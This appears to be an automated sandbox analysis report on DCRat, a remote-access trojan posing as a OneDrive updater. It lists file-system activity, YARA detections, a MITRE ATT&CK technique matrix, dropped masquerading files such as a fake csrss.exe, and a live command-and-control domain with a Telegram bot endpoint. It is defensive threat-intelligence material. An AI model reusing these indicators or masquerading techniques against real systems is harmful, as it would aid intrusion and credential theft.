Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Users\Public\Documents\csrss.exe VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Queries volume information: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Users\Public\Documents\csrss.exe VolumeInformation
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Queries volume information: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Users\Public\Documents\csrss.exe VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Users\Public\Documents\csrss.exe VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Queries volume information: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe VolumeInformation
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Users\Public\Documents\csrss.exe VolumeInformation
Source: C:\Users\Public\Documents\csrss.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: OneDriveStandaloneUpdater.exe, type: SAMPLE
Source: Yara match	File source: 0.0.OneDriveStandaloneUpdater.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1247733245.0000000000202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OneDriveStandaloneUpdater.exe PID: 5260, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Documents\csrss.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: OneDriveStandaloneUpdater.exe, type: SAMPLE
Source: Yara match	File source: 0.0.OneDriveStandaloneUpdater.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1247733245.0000000000202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OneDriveStandaloneUpdater.exe PID: 5260, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Documents\csrss.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	11 Process Injection	243 Masquerading	OS Credential Dumping	11 Security Software Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	14 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
OneDriveStandaloneUpdater.exe	64%	Virustotal		Browse
OneDriveStandaloneUpdater.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
OneDriveStandaloneUpdater.exe	100%	Avira	HEUR/AGEN.1309961
OneDriveStandaloneUpdater.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\MCv5EqkMBH.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat	100%	Avira	BAT/Delbat.C
C:\Users\Public\Documents\csrss.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\AppData\Local\Temp\MYvr7swJ3g.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\AppData\Local\Temp\VzpByHn75i.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\T7zpOYzElC.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	100%	Joe Sandbox ML
C:\Users\Public\Documents\csrss.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Mail\MjlsqDcSPlv.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Documents\csrss.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\MjlsqDcSPlv.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\APmXeiLI.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AVoOdXhS.log	25%	ReversingLabs
C:\Users\user\Desktop\BSPWzXwN.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\CUnYbBNA.log	8%	ReversingLabs
C:\Users\user\Desktop\EERPqGGD.log	4%	ReversingLabs
C:\Users\user\Desktop\GKdPiyNu.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\GVFPWxSW.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\HsjPOZbA.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\IzKxwscH.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\JDsxUuzs.log	25%	ReversingLabs
C:\Users\user\Desktop\JOMOLeeW.log	4%	ReversingLabs
C:\Users\user\Desktop\LAjmiABv.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LpAoDpdA.log	25%	ReversingLabs
C:\Users\user\Desktop\NIROLNIi.log	4%	ReversingLabs
C:\Users\user\Desktop\NsnWYYhw.log	8%	ReversingLabs
C:\Users\user\Desktop\OnkfajLl.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\PlXlrHgd.log	8%	ReversingLabs
C:\Users\user\Desktop\QEZfGaYD.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\SrUDuXuD.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\UJJDbPGV.log	8%	ReversingLabs
C:\Users\user\Desktop\WTfEbhlW.log	4%	ReversingLabs
C:\Users\user\Desktop\WmaEvGYQ.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\WoNdSLwd.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\XVEvJLRT.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\XbGmIAmd.log	4%	ReversingLabs
C:\Users\user\Desktop\YUqBbklL.log	4%	ReversingLabs
C:\Users\user\Desktop\ZXUBvZWR.log	8%	ReversingLabs
C:\Users\user\Desktop\caoTeAzl.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\dVzTSQDZ.log	8%	ReversingLabs
C:\Users\user\Desktop\fxnuLaBD.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\hJaCsdsL.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\hyzrKdBs.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\lJHjOcES.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\lYJBZlMp.log	25%	ReversingLabs
C:\Users\user\Desktop\ntqjPtDe.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oJeKCcyH.log	4%	ReversingLabs
C:\Users\user\Desktop\ocVadywh.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\pbHguWQZ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\pniscWHs.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\pzyaVZFL.log	25%	ReversingLabs
C:\Users\user\Desktop\rBkIrIJH.log	8%	ReversingLabs
C:\Users\user\Desktop\sjwHPvrg.log	4%	ReversingLabs
C:\Users\user\Desktop\tYWrkemb.log	25%	ReversingLabs
C:\Users\user\Desktop\vaJZGNqW.log	8%	ReversingLabs
C:\Users\user\Desktop\vcUYBlwU.log	25%	ReversingLabs
C:\Users\user\Desktop\vqLrRVyt.log	25%	ReversingLabs
C:\Users\user\Desktop\wnmzmVNo.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\xJPzewWS.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://574565cm.renyash.top	100%	Avira URL Cloud	malware
http://574565cm.renyash.top/LongpollserverFlowerasyncCdn.php	100%	Avira URL Cloud	malware
http://574565cm.renyash.top/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
574565cm.renyash.top	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/country	OneDriveStandaloneUpdater.exe, 00000000.00000002.1316360942.0000000000A62000.00000002.00000001.01000000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002931000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000033BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.0000000002791000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002961000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002977000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002846000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.0000000003500000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, EERPqGGD.log.41.dr, sjwHPvrg.log.32.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000D.00000002.2612884415.0000016136767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2588818715.000001CAB8ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2706402857.000001F1B1DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2781554792.000001EDB2CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2647889757.0000024BE1EC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	OneDriveStandaloneUpdater.exe, 00000000.00000002.1316360942.0000000000A62000.00000002.00000001.01000000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002931000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000033BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.0000000002791000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002961000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002977000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002846000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.0000000003500000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, EERPqGGD.log.41.dr, sjwHPvrg.log.32.dr	false		high
